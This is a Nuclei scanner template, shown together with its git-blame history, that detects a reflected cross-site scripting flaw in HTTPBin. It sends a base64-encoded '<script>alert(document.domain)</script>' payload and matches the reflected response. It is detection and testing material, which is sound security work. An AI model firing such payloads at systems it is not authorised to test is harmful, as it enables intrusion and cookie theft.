nuclei-templates/vulnerabilities/httpbin/httpbin-xss.yaml

id: httpbin-xss

info:
  name: HTTPBin - Cross-Site Scripting
  author: Adam Crosser
  severity: high
  description: HTTPBin contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/postmanlabs/httpbin
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    shodan-query:
      - html:"https://github.com/requests/httpbin"
      - title:"httpbin.org"
  tags: xss,httpbin,oss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '^<script>alert\(document.domain\)</script>$'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/19
Added 23 Nuclei Templates (#3909) * Added 23 Nuclei Templates * Update cofense-vision-detection.yml * Update sophos-mobile-panel-detection.yml * Update cofense-vision-detection.yml * Update httpbin-open-redirect.yml * Update httpbin-xss.yml * Update ansible-semaphore-panel.yml * Rename ansible-semaphore-panel.yml to ansible-semaphore-panel.yaml * Update and rename avatier_password_management.yml to avatier-password-management.yaml * Update and rename buddy-panel.yml to buddy-panel.yaml * Update and rename buildbot-panel.yml to buildbot-panel.yaml * Update and rename cofense-vision-detection.yml to cofense-vision-panel.yaml * Update and rename concourse-ci-panel.yml to concourse-ci-panel.yaml * Update and rename drone-ci-panel.yml to drone-ci-panel.yaml * Update and rename flowci-detection.yml to flowci-panel.yaml * Update and rename gradle-enterprise-build-cache-detect.yml to gradle-cache-node-detect.yaml * Update and rename exposed-panels/gradle-cache-node-detect.yaml to exposed-panels/gradle/gradle-cache-node-detect.yaml * Update and rename exposed-panels/gradle-enterprise-panel.yml to exposed-panels/gradle/gradle-enterprise-panel.yaml * Update and rename httpbin-detection.yml to httpbin-panel.yaml * Update and rename leostream-detection.yml to leostream-panel.yaml * Delete redash-detection.yml * Update and rename sophos-mobile-panel-detection.yml to sophos-mobile-panel.yaml * Update and rename splunk-enterprise-login-panel.yml to splunk-enterprise-panel.yaml * Update splunk-enterprise-panel.yaml * Update and rename stridercd-detection.yml to stridercd-panel.yaml * Update and rename zuul-panel.yml to zuul-panel.yaml * Update and rename zentral-detection.yml to zentral-panel.yaml * Update and rename api-fastly.yml to api-fastly.yaml * Update and rename api-gitlab.yml to api-gitlab.yaml * Update and rename httpbin-xss.yml to httpbin-xss.yaml * Update and rename httpbin-open-redirect.yml to httpbin-open-redirect.yaml * Update and rename log4j-code42-rce.yml to code42-log4j-rce.yaml * minor matcher fixes * added missing hostname variable * meta data update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-16 13:17:58 +00:00			`id: httpbin-xss`

			`info:`
Normalization of Cross-Site Scripting names (#5329) 2022-09-09 17:34:37 +00:00			`name: HTTPBin - Cross-Site Scripting`
Added 23 Nuclei Templates (#3909) * Added 23 Nuclei Templates * Update cofense-vision-detection.yml * Update sophos-mobile-panel-detection.yml * Update cofense-vision-detection.yml * Update httpbin-open-redirect.yml * Update httpbin-xss.yml * Update ansible-semaphore-panel.yml * Rename ansible-semaphore-panel.yml to ansible-semaphore-panel.yaml * Update and rename avatier_password_management.yml to avatier-password-management.yaml * Update and rename buddy-panel.yml to buddy-panel.yaml * Update and rename buildbot-panel.yml to buildbot-panel.yaml * Update and rename cofense-vision-detection.yml to cofense-vision-panel.yaml * Update and rename concourse-ci-panel.yml to concourse-ci-panel.yaml * Update and rename drone-ci-panel.yml to drone-ci-panel.yaml * Update and rename flowci-detection.yml to flowci-panel.yaml * Update and rename gradle-enterprise-build-cache-detect.yml to gradle-cache-node-detect.yaml * Update and rename exposed-panels/gradle-cache-node-detect.yaml to exposed-panels/gradle/gradle-cache-node-detect.yaml * Update and rename exposed-panels/gradle-enterprise-panel.yml to exposed-panels/gradle/gradle-enterprise-panel.yaml * Update and rename httpbin-detection.yml to httpbin-panel.yaml * Update and rename leostream-detection.yml to leostream-panel.yaml * Delete redash-detection.yml * Update and rename sophos-mobile-panel-detection.yml to sophos-mobile-panel.yaml * Update and rename splunk-enterprise-login-panel.yml to splunk-enterprise-panel.yaml * Update splunk-enterprise-panel.yaml * Update and rename stridercd-detection.yml to stridercd-panel.yaml * Update and rename zuul-panel.yml to zuul-panel.yaml * Update and rename zentral-detection.yml to zentral-panel.yaml * Update and rename api-fastly.yml to api-fastly.yaml * Update and rename api-gitlab.yml to api-gitlab.yaml * Update and rename httpbin-xss.yml to httpbin-xss.yaml * Update and rename httpbin-open-redirect.yml to httpbin-open-redirect.yaml * Update and rename log4j-code42-rce.yml to code42-log4j-rce.yaml * minor matcher fixes * added missing hostname variable * meta data update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-16 13:17:58 +00:00			`author: Adam Crosser`
Dashboard Content Enhancements (#5436) Dashboard Content Enhancements 2022-09-21 21:42:27 +00:00			`severity: high`
			`description: HTTPBin contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://github.com/postmanlabs/httpbin`
Dashboard Content Enhancements (#5436) Dashboard Content Enhancements 2022-09-21 21:42:27 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N`
			`cvss-score: 7.2`
			`cwe-id: CWE-79`
Added 23 Nuclei Templates (#3909) * Added 23 Nuclei Templates * Update cofense-vision-detection.yml * Update sophos-mobile-panel-detection.yml * Update cofense-vision-detection.yml * Update httpbin-open-redirect.yml * Update httpbin-xss.yml * Update ansible-semaphore-panel.yml * Rename ansible-semaphore-panel.yml to ansible-semaphore-panel.yaml * Update and rename avatier_password_management.yml to avatier-password-management.yaml * Update and rename buddy-panel.yml to buddy-panel.yaml * Update and rename buildbot-panel.yml to buildbot-panel.yaml * Update and rename cofense-vision-detection.yml to cofense-vision-panel.yaml * Update and rename concourse-ci-panel.yml to concourse-ci-panel.yaml * Update and rename drone-ci-panel.yml to drone-ci-panel.yaml * Update and rename flowci-detection.yml to flowci-panel.yaml * Update and rename gradle-enterprise-build-cache-detect.yml to gradle-cache-node-detect.yaml * Update and rename exposed-panels/gradle-cache-node-detect.yaml to exposed-panels/gradle/gradle-cache-node-detect.yaml * Update and rename exposed-panels/gradle-enterprise-panel.yml to exposed-panels/gradle/gradle-enterprise-panel.yaml * Update and rename httpbin-detection.yml to httpbin-panel.yaml * Update and rename leostream-detection.yml to leostream-panel.yaml * Delete redash-detection.yml * Update and rename sophos-mobile-panel-detection.yml to sophos-mobile-panel.yaml * Update and rename splunk-enterprise-login-panel.yml to splunk-enterprise-panel.yaml * Update splunk-enterprise-panel.yaml * Update and rename stridercd-detection.yml to stridercd-panel.yaml * Update and rename zuul-panel.yml to zuul-panel.yaml * Update and rename zentral-detection.yml to zentral-panel.yaml * Update and rename api-fastly.yml to api-fastly.yaml * Update and rename api-gitlab.yml to api-gitlab.yaml * Update and rename httpbin-xss.yml to httpbin-xss.yaml * Update and rename httpbin-open-redirect.yml to httpbin-open-redirect.yaml * Update and rename log4j-code42-rce.yml to code42-log4j-rce.yaml * minor matcher fixes * added missing hostname variable * meta data update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-16 13:17:58 +00:00			`metadata:`
			`shodan-query:`
			`- html:"https://github.com/requests/httpbin"`
			`- title:"httpbin.org"`
			`tags: xss,httpbin,oss`

			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+'`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`part: body`
			`regex:`
			`- '^<script>alert\(document.domain\)</script>$'`

			`- type: word`
			`part: header`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
			`- 200`
Dashboard Content Enhancements (#5436) Dashboard Content Enhancements 2022-09-21 21:42:27 +00:00
			`# Enhanced by md on 2022/09/19`